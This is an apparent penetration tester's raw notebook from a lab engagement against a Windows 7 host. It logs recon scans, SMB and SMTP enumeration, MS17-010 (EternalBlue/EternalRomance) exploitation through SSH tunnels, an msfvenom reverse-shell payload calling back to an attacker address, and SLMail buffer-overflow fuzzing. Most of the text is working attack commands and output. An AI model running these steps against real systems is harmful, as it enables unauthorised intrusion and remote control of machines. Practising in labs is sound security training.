root@an0nym0us3:~# ping 172.30.67.170
PING 172.30.67.170 (172.30.67.170) 56(84) bytes of data.
64 bytes from 172.30.67.170: icmp_seq=1 ttl=62 time=75.1 ms

ssh root@172.30.67.170


# here is the target 

nslookup coolnewstartup.com 


Server:		192.0.2.1
Address:	192.0.2.1#53

Name:	coolnewstartup.com
Address: 198.51.100.35

# do a basic scan 

nmap 198.51.100.35

Starting Nmap 7.60 ( https://nmap.org ) at 2020-04-16 21:30 EDT
Nmap scan report for 198.51.100.35
Host is up, received echo-reply ttl 127 (0.00013s latency).
Not shown: 938 closed ports, 47 filtered ports
Reason: 938 resets and 47 no-responses
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE      REASON
25/tcp    open  smtp         syn-ack ttl 127
79/tcp    open  finger       syn-ack ttl 127
80/tcp    open  http         syn-ack ttl 127
106/tcp   open  pop3pw       syn-ack ttl 127
110/tcp   open  pop3         syn-ack ttl 127
135/tcp   open  msrpc        syn-ack ttl 127
139/tcp   open  netbios-ssn  syn-ack ttl 127
443/tcp   open  https        syn-ack ttl 127
445/tcp   open  microsoft-ds syn-ack ttl 127
49152/tcp open  unknown      syn-ack ttl 127
49153/tcp open  unknown      syn-ack ttl 127
49154/tcp open  unknown      syn-ack ttl 127
49155/tcp open  unknown      syn-ack ttl 127
49156/tcp open  unknown      syn-ack ttl 127
49157/tcp open  unknown      syn-ack ttl 127

Nmap done: 1 IP address (1 host up) scanned in 14.79 seconds

# detailed nmap scan 

nmap -sC -sV -Pn -p- 198.51.100.35

Starting Nmap 7.60 ( https://nmap.org ) at 2020-04-16 21:31 EDT
Nmap scan report for 198.51.100.35
Host is up, received user-set (0.00013s latency).
Not shown: 45833 closed ports, 19686 filtered ports
Reason: 45833 resets and 19686 no-responses
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE      REASON          VERSION
25/tcp    open  smtp         syn-ack ttl 127 SLmail smtpd 5.5.0.4433
| smtp-commands: coolnewstartup.com, SIZE 100000000, SEND, SOML, SAML, HELP, VRFY, EXPN, ETRN, XTRN, 
|_ This server supports the following commands. HELO MAIL RCPT DATA RSET SEND SOML SAML HELP NOOP QUIT 
79/tcp    open  finger       syn-ack ttl 127 SLMail fingerd
|_finger: Finger online user list request denied.\x0D
80/tcp    open  http         syn-ack ttl 127 Apache httpd 2.4.18 ((Win32) OpenSSL/1.0.2g)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.18 (Win32) OpenSSL/1.0.2g
|_http-title: Startup Generator
106/tcp   open  pop3pw       syn-ack ttl 127 SLMail pop3pw
110/tcp   open  pop3         syn-ack ttl 127 BVRP Software SLMAIL pop3d
135/tcp   open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
180/tcp   open  http         syn-ack ttl 127 Seattle Lab httpd 1.0
| http-auth: 
| HTTP/1.0 401 Unauthorized\x0D
|_  Basic realm=Administration
|_http-server-header: Seattle Lab HTTP Server/1.0
|_http-title: Site doesn't have a title.
443/tcp   open  ssl/http     syn-ack ttl 127 Apache httpd 2.4.18 ((Win32) OpenSSL/1.0.2g)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.18 (Win32) OpenSSL/1.0.2g
|_http-title: Startup Generator
| ssl-cert: Subject: organizationName=Apache Haus Distribution Test Certificate/stateOrProvinceName=Some-State/countryName=DE
| Not valid before: 2012-04-06T00:21:34
|_Not valid after:  2020-04-04T00:21:34
|_ssl-date: TLS randomness does not represent time
445/tcp   open  microsoft-ds syn-ack ttl 127 Windows 7 Professional 7600 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49153/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49154/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49155/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49156/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49157/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
Service Info: Hosts: coolnewstartup.com, BOB-WIN7-SP0; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -1482d00h00m01s, deviation: 0s, median: -1482d00h00m01s
|_nbstat: NetBIOS name: BOB-WIN7-SP0, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:92:7c:76 (VMware)
| smb-os-discovery: 
|   OS: Windows 7 Professional 7600 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::-:professional
|   Computer name: Bob-Win7-SP0
|   NetBIOS computer name: BOB-WIN7-SP0\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2016-03-26T21:33:02-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2016-03-26 21:33:02
|_  start_date: 2020-04-17 01:25:15

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 109.05 seconds

# 25 

telnet 198.51.100.35 25

Help
214-This server supports the following commands.
214-HELO    MAIL    RCPT    DATA    RSET
214-SEND    SOML    SAML    HELP    NOOP
214 QUIT

#nmap scripts 

nmap --script=smtp-ntlm-info.nse,smtp-vuln-cve2010-4344.nse,smtp-commands.nse,smtp-open-relay.nse,smtp-vuln-cve2011-1720.nse,smtp-enum-users.nse,smtp-strangeport.nse,smtp-vuln-cve2011-1764.nse -p 25 198.51.100.35


Starting Nmap 7.60 ( https://nmap.org ) at 2020-04-16 21:47 EDT
Nmap scan report for 198.51.100.35
Host is up, received echo-reply ttl 127 (0.00032s latency).

PORT   STATE SERVICE REASON
25/tcp open  smtp    syn-ack ttl 127
| smtp-commands: coolnewstartup.com, SIZE 100000000, SEND, SOML, SAML, HELP, VRFY, EXPN, ETRN, XTRN, 
|_ This server supports the following commands. HELO MAIL RCPT DATA RSET SEND SOML SAML HELP NOOP QUIT 
| smtp-enum-users: 
|   root
|   admin
|   administrator
|   webadmin
|   sysadmin
|   netadmin
|   guest
|   user
|   web
|_  test
|_smtp-open-relay: Server is an open relay (9/16 tests)
| smtp-vuln-cve2010-4344: 
|_  The SMTP server is not Exim: NOT VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 13.35 seconds



## 79 fingger 


# try the nmap script 
nmap --script=finger.nse -Pn -p 79 198.51.100.35

Starting Nmap 7.60 ( https://nmap.org ) at 2020-04-16 21:43 EDT
Nmap scan report for 198.51.100.35
Host is up, received user-set (0.00034s latency).

PORT   STATE SERVICE REASON
79/tcp open  finger  syn-ack ttl 127
|_finger: Finger online user list request denied.\x0D

Nmap done: 1 IP address (1 host up) scanned in 23.25 seconds

# try finger 
finger @198.51.100.35

Finger online user list request denied.

# we can still use this to verify users 

finger bob@198.51.100.35

Unable to find specified user.

finger root@198.51.100.35
User Id: root                           Name: Root User


# try more later 

# 80 and 443 


# set up tunnel to port 80 

ssh -L 12345:198.51.100.35:80 root@172.30.77.75 -NT

http://localhost:12345/?s=798428527245

# Startup generator? maybe that is the software getting used

# names on the site:

Madison Spencley
Sabreen Woodard
Luke Coolen
Max Curry
Zachary Komsa

# it keeps changing?
# gobuster and nikto it 

gobuster -w /usr/share/wordlists/dirb/common.txt -t 30 -x html,asp,php -u http://198.51.100.35 -o gobuster_80

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://198.51.100.35/
[+] Threads      : 30
[+] Wordlist     : /usr/share/wordlists/dirb/common.txt
[+] Status codes : 200,204,301,302,307
[+] Extensions   : .html,.asp,.php
=====================================================
/css (Status: 301)
/fonts (Status: 301)
/img (Status: 301)
/index.html (Status: 200)
/index.html (Status: 200)
/Index.html (Status: 200)
/js (Status: 301)
=====================================================

nikto -h 198.51.100.35

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          198.51.100.35
+ Target Hostname:    198.51.100.35
+ Target Port:        80
+ Start Time:         2020-04-17 10:11:18 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Win32) OpenSSL/1.0.2g
+ Server leaks inodes via ETags, header found with file /, fields: 0x3056 0x52ee5f9ab3255 
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8345 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2020-04-17 10:11:40 (GMT-4) (22 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

# 443

ssh -L 12345:198.51.100.35:443 root@172.30.77.75 -NT

gobuster -w /usr/share/wordlists/dirb/common.txt -t 30 -x html,asp,php -u https://198.51.100.35

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : https://198.51.100.35/
[+] Threads      : 30
[+] Wordlist     : /usr/share/wordlists/dirb/common.txt
[+] Status codes : 200,204,301,302,307
[+] Extensions   : .html,.asp,.php
=====================================================
/css (Status: 301)
/fonts (Status: 301)
/img (Status: 301)
/index.html (Status: 200)
/index.html (Status: 200)
/Index.html (Status: 200)
/js (Status: 301)
=====================================================

nikto -h 198.51.100.35 -p 443

# same shit 
#

ssh -L 12345:198.51.100.35:180 root@172.30.77.75 -NT

# admin dash for seattle labs and we cannot authenticate 

# 139/445

enum4linux -a 198.51.100.35

 ===================================================== 
|    Enumerating Workgroup/Domain on 198.51.100.35    |
 ===================================================== 
[+] Got domain/workgroup name: WORKGROUP

 ============================================= 
|    Nbtstat Information for 198.51.100.35    |
 ============================================= 
Looking up status of 198.51.100.35
	BOB-WIN7-SP0    <20> -         B <ACTIVE>  File Server Service
	BOB-WIN7-SP0    <00> -         B <ACTIVE>  Workstation Service
	WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
	WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
	WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
	..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser

	MAC Address = 00-50-56-92-7C-76

 ====================================== 
|    Session Check on 198.51.100.35    |
 ====================================== 
[+] Server 198.51.100.35 allows sessions using username '', password ''

# try to conenct with smb tools 

#vuln snace
nmap -script=smb-vuln* -sV -Pn -p 139,445 --open 198.51.100.35

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.41 seconds
root@fadedgrandma-kali:~/allthethings# 

# lets try eternal blue 

msfconsole 

search ms17-010

use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 198.51.100.35

[*] [2020.04.16-22:04:37] 198.51.100.35:445     - Connected to \\198.51.100.35\IPC$ with TID = 2048
[*] [2020.04.16-22:04:37] 198.51.100.35:445     - Received STATUS_INSUFF_SERVER_RESOURCES with FID = 0
[+] [2020.04.16-22:04:37] 198.51.100.35:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7600 x86 (32-bit)
[*] [2020.04.16-22:04:37] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed



use exploit/windows/smb/ms17_010_eternalblue

set RHOST 198.51.100.35
set payload windows/x64/shell_reverse_tcp
set LPORT 4444

# need to set up a ssh tunnel!

# psexec worked so we can run commands! 

# set up the tunnel
ssh -L 12345:198.51.100.35:445 root@172.30.77.75 -NT
# run the admin/smb/ms17_010_command through the tunnel 

use auxiliary/admin/smb/ms17_010_command

set RPORT 12345
set RHOSTS 127.0.0.1
set command net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Bob                      Guest                    
The command completed with one or more errors.



[*] 127.0.0.1:12345       - Scanned 1 of 1 hosts (100% complete)

# it worked! 

# smb tools attempt

smbclient -L 198.51.100.35 -U "" -N
smbclient -L 198.51.100.35 -U "guest"%

WARNING: The "syslog" option is deprecated

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	Users           Disk      
Reconnecting with SMB1 for workgroup listing.
Connection to 198.51.100.35 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available

smbmap -H 198.51.100.35 -u guest 

[+] Finding open SMB ports....
[+] User SMB session establishd on 198.51.100.35...
[+] IP: 198.51.100.35:445	Name: unkown                                            
	Disk                                                  	Permissions
	----                                                  	-----------
	ADMIN$                                            	NO ACCESS
	C$                                                	NO ACCESS
	IPC$                                              	NO ACCESS
	Users                                             	READ ONLY

# list out the content if the user share 

smbmap -R Users -H 198.51.100.35 -u guest -p ""

# contents of the directory 

+] Finding open SMB ports....
[+] User SMB session establishd on 198.51.100.35...
[+] IP: 198.51.100.35:445	Name: unkown                                            
	Disk                                                  	Permissions
	----                                                  	-----------
	Users                                             	READ ONLY
	.\
	dw--w--w--                0 Thu Mar 24 04:15:32 2016	.
	dw--w--w--                0 Thu Mar 24 04:15:32 2016	..
	dw--w--w--                0 Thu Mar 24 08:11:25 2016	Default
	-r--r--r--              174 Thu Mar 24 08:09:49 2016	desktop.ini
	.\\Default\
	dw--w--w--                0 Thu Mar 24 08:11:25 2016	.
	dw--w--w--                0 Thu Mar 24 08:11:25 2016	..
	dr--r--r--                0 Thu Mar 24 08:11:25 2016	AppData
	dw--w--w--                0 Thu Mar 24 08:11:25 2016	Desktop
	dw--w--w--                0 Thu Mar 24 08:11:25 2016	Documents
	dw--w--w--                0 Thu Mar 24 08:11:25 2016	Downloads
	dw--w--w--                0 Thu Mar 24 08:11:25 2016	Favorites
	dw--w--w--                0 Thu Mar 24 08:11:25 2016	Links
	dw--w--w--                0 Thu Mar 24 08:11:25 2016	Music
	-r--r--r--           262144 Thu Mar 24 07:12:06 2016	NTUSER.DAT
	-r--r--r--             1024 Thu Mar 24 08:11:23 2016	NTUSER.DAT.LOG
	-r--r--r--           197632 Thu Mar 24 07:12:06 2016	NTUSER.DAT.LOG1
	-r--r--r--                0 Thu Mar 24 08:11:25 2016	NTUSER.DAT.LOG2
	-r--r--r--            65536 Thu Mar 24 08:09:49 2016	NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf
	-r--r--r--           524288 Thu Mar 24 08:09:49 2016	NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms
	-r--r--r--           524288 Thu Mar 24 08:09:49 2016	NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms
	dw--w--w--                0 Thu Mar 24 08:11:25 2016	Pictures
	dr--r--r--                0 Thu Mar 24 08:11:25 2016	Saved Games
	dw--w--w--                0 Thu Mar 24 08:11:25 2016	Videos
	.\\Default\AppData\
	dr--r--r--                0 Thu Mar 24 08:11:25 2016	.
	dr--r--r--                0 Thu Mar 24 08:11:25 2016	..
	dr--r--r--                0 Thu Mar 24 08:11:25 2016	Local
	dr--r--r--                0 Thu Mar 24 08:11:25 2016	Roaming
	.\\Default\AppData\Local\
	dr--r--r--                0 Thu Mar 24 08:11:25 2016	.
	dr--r--r--                0 Thu Mar 24 08:11:25 2016	..
	dr--r--r--                0 Thu Mar 24 08:11:25 2016	Microsoft
	dr--r--r--                0 Thu Mar 24 08:11:25 2016	Temp
	.\\Default\AppData\Local\Microsoft\
	dr--r--r--                0 Thu Mar 24 08:11:25 2016	.
	dr--r--r--                0 Thu Mar 24 08:11:25 2016	..
	dr--r--r--                0 Thu Mar 24 08:11:25 2016	Windows
	.\\Default\AppData\Local\Microsoft\Windows\
	dr--r--r--                0 Thu Mar 24 08:11:25 2016	.
	dr--r--r--                0 Thu Mar 24 08:11:25 2016	..
	dr--r--r--                0 Thu Mar 24 08:11:25 2016	GameExplorer
	dr--r--r--                0 Thu Mar 24 08:11:25 2016	History
	dr--r--r--                0 Thu Mar 24 08:11:25 2016	Temporary Internet Files
	.\\Default\AppData\Roaming\
	dr--r--r--                0 Thu Mar 24 08:11:25 2016	.
	dr--r--r--                0 Thu Mar 24 08:11:25 2016	..
	dr--r--r--                0 Thu Mar 24 08:11:25 2016	Media Center Programs
	dr--r--r--                0 Thu Mar 24 08:11:25 2016	Microsoft
	.\\Default\AppData\Roaming\Microsoft\
	dr--r--r--                0 Thu Mar 24 08:11:25 2016	.
	dr--r--r--                0 Thu Mar 24 08:11:25 2016	..
	dr--r--r--                0 Thu Mar 24 08:11:25 2016	Internet Explorer
	dr--r--r--                0 Thu Mar 24 08:11:25 2016	Windows
	.\\Default\AppData\Roaming\Microsoft\Internet Explorer\
	dr--r--r--                0 Thu Mar 24 08:11:25 2016	.
	dr--r--r--                0 Thu Mar 24 08:11:25 2016	..
	dw--w--w--                0 Thu Mar 24 08:11:25 2016	Quick Launch
	.\\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\
	dw--w--w--                0 Thu Mar 24 08:11:25 2016	.
	dw--w--w--                0 Thu Mar 24 08:11:25 2016	..
	-r--r--r--              146 Thu Mar 24 08:09:49 2016	desktop.ini
	-r--r--r--              290 Thu Mar 24 08:09:49 2016	Shows Desktop.lnk
	-r--r--r--              272 Thu Mar 24 08:09:49 2016	Window Switcher.lnk
	.\\Default\AppData\Roaming\Microsoft\Windows\
	dr--r--r--                0 Thu Mar 24 08:11:25 2016	.
	dr--r--r--                0 Thu Mar 24 08:11:25 2016	..
	dr--r--r--                0 Thu Mar 24 08:11:25 2016	Cookies
	dr--r--r--                0 Thu Mar 24 08:11:25 2016	Network Shortcuts
	dr--r--r--                0 Thu Mar 24 08:11:25 2016	Printer Shortcuts
	dw--w--w--                0 Thu Mar 24 08:11:25 2016	Recent
	dw--w--w--                0 Thu Mar 24 08:11:25 2016	SendTo
	dw--w--w--                0 Thu Mar 24 08:11:25 2016	Start Menu
	dr--r--r--                0 Thu Mar 24 08:11:25 2016	Templates
	.\\Default\AppData\Roaming\Microsoft\Windows\SendTo\
	dw--w--w--                0 Thu Mar 24 08:11:25 2016	.
	dw--w--w--                0 Thu Mar 24 08:11:25 2016	..
	-r--r--r--                3 Thu Mar 24 08:09:49 2016	Compressed (zipped) Folder.ZFSendToTarget
	-r--r--r--                7 Thu Mar 24 08:09:49 2016	Desktop (create shortcut).DeskLink
	-r--r--r--              558 Thu Mar 24 08:09:49 2016	Desktop.ini
	-r--r--r--             1238 Thu Mar 24 08:09:49 2016	Fax Recipient.lnk
	-r--r--r--                4 Thu Mar 24 08:09:49 2016	Mail Recipient.MAPIMail
	.\\Default\AppData\Roaming\Microsoft\Windows\Start Menu\
	dw--w--w--                0 Thu Mar 24 08:11:25 2016	.
	dw--w--w--                0 Thu Mar 24 08:11:25 2016	..
	dr--r--r--                0 Thu Mar 24 08:11:25 2016	Programs
	.\\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
	dr--r--r--                0 Thu Mar 24 08:11:25 2016	.
	dr--r--r--                0 Thu Mar 24 08:11:25 2016	..
	dw--w--w--                0 Thu Mar 24 08:11:25 2016	Accessories
	dw--w--w--                0 Thu Mar 24 08:11:25 2016	Maintenance
	.\\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\
	dw--w--w--                0 Thu Mar 24 08:11:25 2016	.
	dw--w--w--                0 Thu Mar 24 08:11:25 2016	..
	dw--w--w--                0 Thu Mar 24 08:11:25 2016	Accessibility
	-r--r--r--             1280 Thu Mar 24 08:09:49 2016	Command Prompt.lnk
	-r--r--r--              678 Thu Mar 24 08:09:49 2016	Desktop.ini
	-r--r--r--             1304 Thu Mar 24 08:09:49 2016	Notepad.lnk
	-r--r--r--              262 Thu Mar 24 08:09:49 2016	Run.lnk
	dw--w--w--                0 Thu Mar 24 08:11:25 2016	System Tools
	-r--r--r--             1228 Thu Mar 24 08:09:49 2016	Windows Explorer.lnk
	.\\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\
	dw--w--w--                0 Thu Mar 24 08:11:25 2016	.
	dw--w--w--                0 Thu Mar 24 08:11:25 2016	..
	-r--r--r--              704 Thu Mar 24 08:09:49 2016	Desktop.ini
	-r--r--r--             1358 Thu Mar 24 08:09:49 2016	Ease of Access.lnk
	-r--r--r--             1258 Thu Mar 24 08:09:49 2016	Magnify.lnk
	-r--r--r--             1262 Thu Mar 24 08:09:49 2016	Narrator.lnk
	-r--r--r--             1250 Thu Mar 24 08:09:49 2016	On-Screen Keyboard.lnk
	.\\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\
	dw--w--w--                0 Thu Mar 24 08:11:25 2016	.
	dw--w--w--                0 Thu Mar 24 08:11:25 2016	..
	-r--r--r--              262 Thu Mar 24 08:09:49 2016	computer.lnk
	-r--r--r--              262 Thu Mar 24 08:09:49 2016	Control Panel.lnk
	-r--r--r--              592 Thu Mar 24 08:09:49 2016	Desktop.ini
	-r--r--r--             1306 Thu Mar 24 08:09:49 2016	Private Character Editor.lnk
	.\\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\
	dw--w--w--                0 Thu Mar 24 08:11:25 2016	.
	dw--w--w--                0 Thu Mar 24 08:11:25 2016	..
	-r--r--r--              318 Thu Mar 24 08:09:49 2016	Desktop.ini
	-r--r--r--              262 Thu Mar 24 08:09:49 2016	Help.lnk

# eternal romance set up 

# set up the tunnnel 

ssh -L 445:198.51.100.35:445 root@172.30.65.85 -NT

cd /root/.wine-fuzzbunch/drive_c/fuzzbunch-debian/windows/

wine cmd.exe

python fb.py

127.0.0.1

# outfile 

Z:\root\.wine-fuzzbunch\drive_c\fuzzbunch-debian\windows\bob.bin


# build the reverse shell on the attacker box: 

msfvenom -p windows/shell_reverse_tcp -f dll -a x86 --platform windows LHOST=192.0.2.25 LPORT=4444 > /root/.wine-fuzzbunch/drive_c/fuzzbunch-debian/windows/meta.dll
# on my kali box 

payload path: Z:\root\.wine-fuzzbunch\drive_c\fuzzbunch-debian\windows\meta.dll

# follow the guide from Bruce 
## It worked!! this is going to be one hell of a write up 



## 110 / 106 Lets try SLMail which we know if vuln to buffer overflow

ssh -L 106:198.51.100.35:106 root@172.30.77.75 -NT

python pop3-pass-fuzz.py 
Fuzzing PASS with 1 bytes
Fuzzing PASS with 100 bytes
Fuzzing PASS with 300 bytes
Fuzzing PASS with 500 bytes
Fuzzing PASS with 700 bytes
Fuzzing PASS with 900 bytes
Fuzzing PASS with 1100 bytes
Fuzzing PASS with 1300 bytes
Fuzzing PASS with 1500 bytes
Fuzzing PASS with 1700 bytes
Fuzzing PASS with 1900 bytes
Fuzzing PASS with 2100 bytes
Fuzzing PASS with 2300 bytes
Fuzzing PASS with 2500 bytes
Fuzzing PASS with 2700 bytes
Fuzzing PASS with 2900 bytes
Fuzzing PASS with 3100 bytes
Fuzzing PASS with 3300 bytes
Fuzzing PASS with 3500 bytes
Fuzzing PASS with 3700 bytes
Fuzzing PASS with 3900 bytes
Fuzzing PASS with 4100 bytes
Fuzzing PASS with 4300 bytes
Fuzzing PASS with 4500 bytes
Fuzzing PASS with 4700 bytes
Fuzzing PASS with 4900 bytes
Fuzzing PASS with 5100 bytes
Fuzzing PASS with 5300 bytes
Fuzzing PASS with 5500 bytes
Fuzzing PASS with 5700 bytes
Fuzzing PASS with 5900 bytes

# lets try 110 


ssh -L 110:198.51.100.35:110 root@172.30.77.75 -NT

# same 5900 bytes, maybe we can work with that


#SLMAIL 5.5.0.4433 is vulnerable to BOF!  Lets dev
# there are opensource exploits but not sure if we can use them for 

Windows 7 Professional 7600 (Windows 7 Professional 6.1)
#SP0 



